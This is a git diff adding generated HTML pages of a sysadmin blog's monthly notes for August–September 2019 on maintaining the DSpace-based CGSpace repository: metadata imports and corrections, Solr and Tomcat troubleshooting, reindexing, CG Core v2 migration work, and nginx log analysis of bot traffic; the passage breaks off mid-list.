+<li>For example, <code>Wild_cherry_Prunus_avium_859.pdf</code> is here (with double underscore): <a href="https://www.bioversityinternational.org/fileadmin/_migrated/uploads/tx_news/Wild_cherry__Prunus_avium__859.pdf">https://www.bioversityinternational.org/fileadmin/_migrated/uploads/tx_news/Wild_cherry__Prunus_avium__859.pdf</a></li>
+</ul>
+</li>
+<li>
+<p>I will proceed with a metadata-only upload first and then let them know about the missing PDFs</p>
+</li>
+<li>
+<p>Troubleshoot an issue we had with proxying to the new development version of AReS from DSpace Test (linode19)</p>
+<ul>
+<li>For some reason the host header in the proxy pass is not set so nginx on DSpace Test makes a request to the upstream nginx on an IP-based virtual host</li>
+<li>The upstream nginx returns HTTP 444 because we configured it to not answer when a request does not send a valid hostname</li>
+<li>The solution is to set the host header when proxy passing:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>proxy_set_header Host dev.ares.codeobia.com;
+</code></pre><ul>
+<li>Though I am really wondering why this happened now, because the configuration has been working for months&hellip;</li>
+<li>Improve the output of the suspicious characters check in <a href="https://github.com/alanorth/csv-metadata-quality">csv-metadata-quality</a> script and tag version 0.2.0</li>
+</ul>
+<h2 id="2019-08-09">2019-08-09</h2>
+<ul>
+<li>Looking at the 128 IITA records (20195TH.xls) that Sisay uploadd to DSpace Test last month: <a href="https://dspacetest.cgiar.org/handle/10568/102361">IITA_July_29</a>
+<ul>
+<li>The records are pretty clean because Sisay ran them through the csv-metadata-quality tool</li>
+<li>I fixed one incorrect country (MELBOURNE)</li>
+<li>I normalized all DOIs to be <a href="https://doi.org">https://doi.org</a> format</li>
+<li>This item is using the wrong Google Books link: <a href="https://dspacetest.cgiar.org/handle/10568/102593">https://dspacetest.cgiar.org/handle/10568/102593</a></li>
+<li>The French abstract here has copy/paste errors: <a href="https://dspacetest.cgiar.org/handle/10568/102491">https://dspacetest.cgiar.org/handle/10568/102491</a></li>
+<li>Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine:
+<ul>
+<li><code>$ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id</code></li>
+<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new colum and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
+</ul>
+</li>
+<li>I asked Bosede to check about twenty-five invalid AGROVOC subjects identified by csv-metadata-quality script</li>
+<li>I still need to check the sponsors and then check for duplicates</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-08-10">2019-08-10</h2>
+<ul>
+<li>Add checks for uncommon filename extensions and replacements for unneccesary Unicode to the csv-metadata-quality script</li>
+</ul>
+<h2 id="2019-08-12">2019-08-12</h2>
+<ul>
+<li>Looking at the 128 IITA records again:
+<ul>
+<li>Validate and normalize affiliations against our 2019-02 list using reconcile-csv and OpenRefine:
+<ul>
+<li><code>$ lein run ~/src/git/DSpace/2019-02-22-sponsorships.csv name id</code></li>
+<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new colum and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
+</ul>
+</li>
+<li>I checked the collection for duplicates and found a few:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/102513">https://dspacetest.cgiar.org/handle/10568/102513</a> is a duplicate of CIAT item: <a href="https://cgspace.cgiar.org/handle/10568/44158">https://cgspace.cgiar.org/handle/10568/44158</a></li>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/102512">https://dspacetest.cgiar.org/handle/10568/102512</a> is a duplicate of CIAT item: <a href="https://cgspace.cgiar.org/handle/10568/43557">https://cgspace.cgiar.org/handle/10568/43557</a></li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-08-13">2019-08-13</h2>
+<ul>
+<li>Create a test user on DSpace Test for Mohammad Salem to attempt depositing:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p &#39;domoamaaa&#39;
+</code></pre><ul>
+<li>Create and merge a pull request (<a href="https://github.com/ilri/DSpace/pull/429">#429</a>) to add eleven new CCAFS Phase II Project Tags to CGSpace</li>
+<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">Solr cores issue</a> last week, but they could not reproduce the issue
+<ul>
+<li>I told them not to continue, and that we would keep an eye on it and keep troubleshooting it (if neccessary) in the public eye on dspace-tech and Solr mailing lists</li>
+</ul>
+</li>
+<li>Testing an import of 1,429 Bioversity items (metadata only) on my local development machine and got an error with Java memory after about 1,000 items:</li>
+</ul>
+<pre tabindex="0"><code>$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
+...
+java.lang.OutOfMemoryError: GC overhead limit exceeded
+</code></pre><ul>
+<li>I increased the heap size to 1536m and tried again:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1536m&#34;
+$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
+</code></pre><ul>
+<li>This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM</li>
+<li>(oops, I realize that actually I forgot to delete items I had flagged as duplicates, so the total should be 1,427 items)</li>
+</ul>
+<h2 id="2019-08-14">2019-08-14</h2>
+<ul>
+<li>I imported the 1,427 Bioversity records into DSpace Test
+<ul>
+<li>To make sure we didn&rsquo;t have memory issues I reduced Tomcat&rsquo;s JVM heap by 512m, increased the import processes&rsquo;s heap to 512m, and split the input file into two parts with about 700 each</li>
+<li>Then I had to create a few new temporary collections on DSpace Test that had been created on CGSpace after our last sync</li>
+<li>After that the import succeeded:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
+$ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
+$ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
+</code></pre><ul>
+<li>The next step is to check these items for duplicates</li>
+</ul>
+<h2 id="2019-08-16">2019-08-16</h2>
+<ul>
+<li>Email Bioversity to let them know that the 1,427 records are on DSpace Test and that Abenet should look over them</li>
+</ul>
+<h2 id="2019-08-18">2019-08-18</h2>
+<ul>
+<li>Deploy latest <code>5_x-prod</code> branch on CGSpace (linode18), including the <a href="https://github.com/ilri/DSpace/pull/429">new CCAFS project tags</a></li>
+<li>Deploy Tomcat 7.0.96 and PostgreSQL JDBC 42.2.6 driver on CGSpace (linde18)</li>
+<li>After restarting Tomcat one of the Solr statistics cores failed to start up:</li>
+</ul>
+<pre tabindex="0"><code>statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
+</code></pre><ul>
+<li>I decided to run all system updates on the server and reboot it</li>
+<li>After reboot the statistics-2018 core failed to load so I restarted <code>tomcat7</code> again</li>
+<li>After this last restart all Solr cores seem to be up and running</li>
+</ul>
+<h2 id="2019-08-20">2019-08-20</h2>
+<ul>
+<li>Francesco sent me a new CSV with the raw filenames and paths for the Bioversity migration
+<ul>
+<li>All file paths are relative to the Typo3 upload path of <code>/fileadmin</code> on the Bioversity website</li>
+<li>I create a new column with the derived URL that I can use to download the PDFs with my <code>generate-thumbnails.py</code> script</li>
+<li>Unfortunately now the filename column has paths too, so I have to use a simple Python/Jython script in OpenRefine to get the basename of the files in the filename column:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>import os
+
+return os.path.basename(value)
+</code></pre><ul>
+<li>Then I can try to download all the files again with the script</li>
+<li>I also asked Francesco about the strange filenames (.LCK, .zip, and .7z)</li>
+</ul>
+<h2 id="2019-08-21">2019-08-21</h2>
+<ul>
+<li>Upload <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality repository to ILRI&rsquo;s GitHub organization</a></li>
+<li>Fix a few invalid countries in IITA&rsquo;s <a href="https://dspacetest.cgiar.org/handle/10568/102361">July 29</a> records (aka &ldquo;20195TH.xls&rdquo;)
+<ul>
+<li>These were not caught by my csv-metadata-quality check script because of a logic error</li>
+<li>Remove <code>dc.identified.uri</code> fields from test data, set <code>id</code> values to &ldquo;-1&rdquo;, add collection mappings according to <code>dc.type</code>, and Upload 126 IITA records to CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-08-22">2019-08-22</h2>
+<ul>
+<li>Transfer original <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> repository to ILRI organization on GitHub</li>
+</ul>
+<h2 id="2019-08-23">2019-08-23</h2>
+<ul>
+<li>Run system updates on AReS / OpenRXV dev server (linode20) and reboot it</li>
+<li>Fix AReS exports on DSpace Test by adding a new nginx proxy pass</li>
+</ul>
+<h2 id="2019-08-26">2019-08-26</h2>
+<ul>
+<li>Peter sent 2,943 corrections to the author dump I had originally sent him on 2019-05-27
+<ul>
+<li>I noticed that one correction had a missing space after the comma, ie &ldquo;Adamou,A.&rdquo; so I corrected it</li>
+<li>Also, I should add that as a check to the csv-metadata-quality pipeline</li>
+<li>Apply the corrections to my local dev machine in preparation for the CGSpace:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
+</code></pre><ul>
+<li>Apply the corrections on CGSpace and DSpace Test
+<ul>
+<li>After that I started a full Discovery re-indexing on both servers:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    81m47.057s 
+user    8m5.265s 
+sys     2m24.715s
+</code></pre><ul>
+<li>
+<p>Peter asked me to add related citation aka <code>cg.link.citation</code> to the item view</p>
+<ul>
+<li>I created a <a href="https://github.com/ilri/DSpace/pull/430">pull request</a> with a draft implementation and asked for Peter&rsquo;s feedback</li>
+</ul>
+</li>
+<li>
+<p>Add the ability to skip certain fields from the csv-metadata-quality script using <code>--exclude-fields</code></p>
+<ul>
+<li>For example, when I&rsquo;m working on the author corrections I want to do the basic checks on the corrected fields, but on the original fields so I would use <code>--exclude-fields dc.contributor.author</code> for example</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-08-27">2019-08-27</h2>
+<ul>
+<li>File <a href="https://github.com/ilri/OpenRXV/issues/11">an issue on OpenRXV</a> for the bug when selecting communities</li>
+<li>Peter approved the related citation changes so I merged the <a href="https://github.com/ilri/DSpace/pull/430">pull request on GitHub</a> and will deploy it to CGSpace this weekend</li>
+<li>Add a safety feature to <code>fix-metadata-values.py</code> that skips correction values that contain the &lsquo;|&rsquo; character</li>
+<li>Help Francesco from Bioversity with the REST and OAI APIs on CGSpace
+<ul>
+<li>He is contracted by Bioversity to work on the migration from Typo3</li>
+<li>I told him that the OAI interface only exposes Dublin Core fields in its default configuration and that he might want to use OAI to get the latest-changed items, then use REST API to get their metadata</li>
+</ul>
+</li>
+<li>Add a fix for missing space after commas to my <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> script and tag version 0.2.2</li>
+</ul>
+<h2 id="2019-08-28">2019-08-28</h2>
+<ul>
+<li>Skype with Jane about AReS Phase III priorities</li>
+<li>I did a test to automatically fix some authors in the database using my csv-metadata-quality script
+<ul>
+<li>First I dumped a list of all unique authors:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
+COPY 65597
+</code></pre><ul>
+<li>Then I created a new CSV with two author columns (edit title of second column after):</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c dc.contributor.author,dc.contributor.author /tmp/2019-08-28-all-authors.csv &gt; /tmp/all-authors.csv
+</code></pre><ul>
+<li>Then I ran my script on the new CSV, skipping one of the author columns:</li>
+</ul>
+<pre tabindex="0"><code>$ csv-metadata-quality -u -i /tmp/all-authors.csv -o /tmp/authors.csv -x dc.contributor.author
+</code></pre><ul>
+<li>This fixed a bunch of issues with spaces, commas, unneccesary Unicode characters, etc</li>
+<li>Then I ran the corrections on my test server and there were 185 of them!</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correctauthor
+</code></pre><ul>
+<li>I very well might run these on CGSpace soon&hellip;</li>
+</ul>
+<h2 id="2019-08-29">2019-08-29</h2>
+<ul>
+<li>Resume working on the CG Core v2 changes in the <code>5_x-cgcorev2</code> branch again
+<ul>
+<li>I notice that CG Core doesn&rsquo;t currently have a field for CGSpace&rsquo;s &ldquo;alternative title&rdquo; (<code>dc.title.alternative</code>), but DCTERMS has <code>dcterms.alternative</code> so I <a href="https://github.com/AgriculturalSemantics/cg-core/issues/9">raised an issue about adding it</a></li>
+<li>Marie responded and said she would add <code>dcterms.alternative</code></li>
+<li>I created a sed script file to perform some replacements of metadata on the XMLUI XSL files:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec ./cgcore-xsl-replacements.sed {} \;
+</code></pre><ul>
+<li>I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running:
+<ul>
+<li>Need to assess the XSL changes to see if things like <code>not(@qualifier)]</code> still make sense after we move fields from DC to DCTERMS, as some fields will no longer have qualifiers</li>
+<li>Do I need to edit the author links to remove <code>dc.contributor.author</code> in <code>0_CGIAR/xsl/aspect/artifactbrowser/item-list-alterations.xsl</code>?</li>
+<li>Do I need to edit the author links to remove <code>dc.contributor.author</code> in <code>0_CGIAR/xsl/aspect/discovery/discovery-item-list-alterations.xsl</code>?</li>
+</ul>
+</li>
+<li>Thierry Lewadle asked why some PDFs on CGSpace open in the browser and some download
+<ul>
+<li>I told him it is because of the &ldquo;content disposition&rdquo; that causes DSpace to tell the browser to open or download the file based on its file size (currently around 8 megabytes)</li>
+</ul>
+</li>
+<li>Peter asked why <a href="https://hdl.handle.net/10568/97825">an item on CGSpace</a> has no Altmetric donut on the item view, but has one in our explorer
+<ul>
+<li>I looked in the network requests when loading the CGSpace item view and I see the following response to the Altmetric API call:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10986/30568&#34;,&#34;10568/97825&#34;],&#34;handle&#34;:&#34;10986/30568&#34;
+</code></pre><ul>
+<li>So this is the same issue we had before, where Altmetric <em>knows</em> this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn&rsquo;t show it because it seems to a secondary handle or something</li>
+</ul>
+<h2 id="2019-08-31">2019-08-31</h2>
+<ul>
+<li>Run system updates on DSpace Test (linode19) and reboot the server</li>
+<li>Run the author fixes on DSpace Test and CGSpace and start a full Discovery re-index:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+ 
+real    90m47.967s
+user    8m12.826s
+sys     2m27.496s
+</code></pre><ul>
+<li>I set up a test environment for CG Core v2 on my local environment and ran all the field migrations
+<ul>
+<li>DSpace comes up and runs, but there are some graphical issues, like missing community names</li>
+<li>It turns out that my sed script was replacing some XSL code that was responsible for printing community names</li>
+<li>See: <code>dspace/modules/xmlui-mirage2/src/main/webapp/themes/0_CGIAR/xsl/preprocess/custom/communitylist.xsl</code></li>
+<li>After reading the code I see that XSLT is reading the community titles from the DIM representation (stored in the <code>$dim</code> variable) created from METS</li>
+<li>I modified the patterns in my sed script so that those lines are not replaced and then the community list works again</li>
+<li>This is actually not a problem at all because this metadata is only used in the HTML meta tags in XMLUI community lists and has nothing to do with item metadata</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-09/index.html b/docs/2019-09/index.html
new file mode 100644
index 000000000..499e4bed3
--- /dev/null
+++ b/docs/2019-09/index.html
@@ -0,0 +1,635 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="September, 2019" />
+<meta property="og:description" content="2019-09-01
+
+Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
+Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
+
+# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-09/" />
+<meta property="article:published_time" content="2019-09-01T10:17:51+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="September, 2019"/>
+<meta name="twitter:description" content="2019-09-01
+
+Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
+Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
+
+# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "September, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-09/",
+  "wordCount": "2870",
+  "datePublished": "2019-09-01T10:17:51+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-09/">
+
+    <title>September, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-09/">September, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-09-01T10:17:51+03:00">Sun Sep 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-09-01">2019-09-01</h2>
+<ul>
+<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
+<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+</code></pre><ul>
+<li><code>3.94.211.189</code> is MauiBot, and most of its requests are to Discovery and get rate limited with HTTP 503</li>
+<li><code>163.172.71.23</code> is some IP on Online SAS in France and its user agent is:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+</code></pre><ul>
+<li>It actually got mostly HTTP 200 responses:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | awk &#39;{print $9}&#39; | sort | uniq -c
+   1775 200
+    703 499
+     72 503
+</code></pre><ul>
+<li>And it was mostly requesting Discover pages:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | grep 163.172.71.23 | grep -o -E &#34;(bitstream|discover|handle)&#34; | sort | uniq -c 
+   2350 discover
+     71 handle
+</code></pre><ul>
+<li>I&rsquo;m not sure why the outbound traffic rate was so high&hellip;</li>
+</ul>
+<h2 id="2019-09-02">2019-09-02</h2>
+<ul>
+<li>Follow up with Carol and Francesca from Bioversity as they were on holiday during the mid-to-late August
+<ul>
+<li>I told them to check the <a href="https://dspacetest.cgiar.org/handle/10568/103999">temporary collection on DSpace Test</a> where I uploaded the 1,427 items so they can see how it will look</li>
+<li>Also, I told them to advise me about the strange file extensions (.7z, .zip, .lck)</li>
+<li>Also, I reminded Abenet to check the metadata, as the institutional authors at least will need some modification</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-10">2019-09-10</h2>
+<ul>
+<li>Altmetric responded to say that they have fixed an issue with their badge code so now research outputs with multiple handles are showing badges!
+<ul>
+<li>See: <a href="https://hdl.handle.net/handle/10568/97825">https://hdl.handle.net/handle/10568/97825</a></li>
+</ul>
+</li>
+<li>Follow up with Bosede about the mixup with PDFs in the items uploaded in 2018-12 (aka Daniel1807.xsl)
+<ul>
+<li>These are the same ones that Peter noticed last week, that Bosede and I had been discussing earlier this year that we never sorted out</li>
+<li>It looks like these items were uploaded by Sisay on 2018-12-19 so we can use the <a href="https://cgspace.cgiar.org/handle/10568/68616/discover?filtertype_1=dateAccessioned&amp;filter_relational_operator_1=contains&amp;filter_1=2018-12-19&amp;submit_apply_filter=&amp;query=">accession date as a filter</a> to narrow it down to 230 items (of which only 104 have PDFs, according to the Daniel1807.xls input input file)</li>
+<li>Now I just checked a few manually and they are correct in the original input file, so something must have happened when Sisay was processing them for upload</li>
+<li>I have asked Sisay to fix them&hellip;</li>
+</ul>
+</li>
+<li>Continue working on CG Core v2 migration, focusing on the crosswalk mappings
+<ul>
+<li>I think we can skip the MODS crosswalk for now because it is only used in <a href="https://wiki.lyrasis.org/display/DSDOC5x/DSpace+AIP+Format#DSpaceAIPFormat-MODSSchema">AIP exports that are meant for non-DSpace systems</a></li>
+<li>We should probably do the QDC crosswalk as well as those in <code>xhtml-head-item.properties</code>&hellip;</li>
+<li>Ouch, there is potentially a lot of work in the OAI metadata formats like DIM, METS, and QDC (see <code>dspace/config/crosswalks/oai/*.xsl</code>)</li>
+<li>In general I think I should only modify the left side of the crosswalk mappings (ie, where metadata is coming from) so we maintain the same exact output for search engines, etc</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-11">2019-09-11</h2>
+<ul>
+<li>Maria Garruccio asked me to add two new Bioversity ORCID identifiers to CGSpace so I created a <a href="https://github.com/ilri/DSpace/pull/431">pull request</a></li>
+<li>Marissa Van Epp asked me to add new CCAFS Phase II project tags to CGSpace so I created a <a href="https://github.com/ilri/DSpace/pull/432">pull request</a>
+<ul>
+<li>I will wait until I hear from her to merge it because there is one tag that seems to be a duplicate because its name (PII-WA_agrosylvopast) is similar to one that already exists (PII-WA_AgroSylvopastoralSystems)</li>
+</ul>
+</li>
+<li>More work on the CG Core v2 migrations
+<ul>
+<li>I have updated my <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">notes on the possible changes</a> and done more work on the XMLUI replacements</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-09-12">2019-09-12</h2>
+<ul>
+<li>Deploy <a href="https://jdbc.postgresql.org/">PostgreSQL JDBC driver</a> version 42.2.7 on DSpace Test and update the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a></li>
+</ul>
+<h2 id="2019-09-15">2019-09-15</h2>
+<ul>
+<li>Deploy Bioversity ORCID identifier updates to CGSpace</li>
+<li>Deploy PostgreSQL JDBC driver 42.2.7 on CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and restart the server
+<ul>
+<li>After restarting the system Tomcat came back up, but not all Solr statistics cores were loaded</li>
+<li>I had to restart Tomcat one more time until the cores were loaded (verified in the Solr admin)</li>
+</ul>
+</li>
+<li>Update nginx TLS cipher suite to the latest <a href="https://ssl-config.mozilla.org/#server=nginx&amp;server-version=1.16.1&amp;config=intermediate&amp;openssl-version=1.0.2g">Mozilla intermediate recommendations for nginx 1.16.0 and openssl 1.0.2</a>
+<ul>
+<li>DSpace Test (linode19) is running Ubuntu 18.04 with nginx 1.17.x and openssl 1.1.1 so it can even use TLS v1.3 if we override the nginx ssl protocol in its host vars</li>
+</ul>
+</li>
+<li>XMLUI item view pages are blank on CGSpace right now
+<ul>
